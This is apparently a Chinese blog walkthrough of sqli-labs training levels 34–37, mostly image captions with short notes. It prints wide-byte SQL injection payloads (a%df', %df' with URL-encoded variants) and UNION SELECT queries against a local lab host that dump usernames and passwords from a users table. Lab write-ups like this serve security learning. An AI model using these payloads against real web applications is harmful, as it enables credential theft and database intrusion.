less 34-37

less34

admin  admin

less 34-37_第1张图片

 

 

ad  ad

 

less 34-37_第2张图片

 

 

a%df’    a%df’   登录失败

 

less 34-37_第3张图片

 

 

less 34-37_第4张图片

 

 

 

 

 

 

 

 less 34-37_第5张图片

 

 

 less 34-37_第6张图片

 

 

 

 

 

 

 

 

 

 

 

 

 

 

a%df\'


uname=a%25df%5C%27&passwd=1111&submit=Submit

a%df%5C%27

删除25  改包后  再次执行一次

less 34-37_第7张图片

 

 

 

 

less 34-37_第8张图片

 

 

 

less 34-37_第9张图片

然后再修改包  猜列数

 

 

 

less 34-37_第10张图片

 

 

 

 

 less 34-37_第11张图片

 

 

 

 也可以使用第二种方法      '   ------>   �'       这里的注释符只可以使用#

less 34-37_第12张图片

 

 

less 34-37_第13张图片

 

 

 

 

 

 less 34-37_第14张图片

 

 

 

 

 

 

LESS35

less 34-37_第15张图片

 

 

less 34-37_第16张图片

 

 

less 34-37_第17张图片

 

 

 

这一关基本与上一关相同,就是没有了数据包裹,所以不用‘直接进行注入:

http://192.168.50.100/sqli-labs/Less-35/?id=111   union select 1,2,

      group_concat(concat_ws(0x7e,username,password)) from security.users

less 34-37_第18张图片

 

 

 

 

 

less36  使用宽字节注入

 

 

 

 less 34-37_第19张图片

 

less 34-37_第20张图片

 

 

 

 

 

 

 

 

 

 

less 34-37_第21张图片

 

 

less 34-37_第22张图片

 

 

 

less 34-37_第23张图片

 

 

less 34-37_第24张图片

 

 

less 34-37_第25张图片

http://192.168.50.100/sqli-labs/Less-36/?id=11111%df'  union select 1,2,3  --+

 

less 34-37_第26张图片

 

 

http://192.168.50.100/sqli-labs/Less-36/?id=11111%df'  union select 1,2,

group_concat(concat_ws(0x7e,username,password)) from security.users  --+

 

 less 34-37_第27张图片

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

less 37 

less 34-37_第28张图片

 

 

less 34-37_第29张图片

 

 

 

 

 

 

 

 

 

 

 

抓包

less 34-37_第30张图片

 

less 34-37_第31张图片

 

less 34-37_第32张图片

 

你可能感兴趣的:(less 34-37)